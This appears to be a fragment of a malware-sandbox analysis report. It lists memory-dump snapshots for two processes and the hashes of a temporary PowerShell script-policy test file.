memory/4708-{2,4,5}-0x0000000000400000-0x000000000043A000-memory.dmp (3 snapshots of the same region)

memory/4708-{6..12}-0x0000000000A60000-0x0000000000B36000-memory.dmp (7 snapshots of the same region)

memory/804-14-0x0000000004870000-0x00000000048A6000-memory.dmp

memory/804-15-0x0000000004EE0000-0x0000000005508000-memory.dmp

memory/804-16-0x0000000004E40000-0x0000000004E62000-memory.dmp

memory/804-17-0x0000000005640000-0x00000000056A6000-memory.dmp

memory/804-18-0x00000000056B0000-0x0000000005716000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lhppubqr.0xk.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/804-28-0x0000000005720000-0x0000000005A74000-memory.dmp

memory/804-29-0x0000000005C30000-0x0000000005C4E000-memory.dmp

memory/804-30-0x0000000005DB0000-0x0000000005DFC000-memory.dmp

memory/804-31-0x0000000007420000-0x0000000007A9A000-memory.dmp

memory/804-32-0x0000000006120000-0x000000000613A000-memory.dmp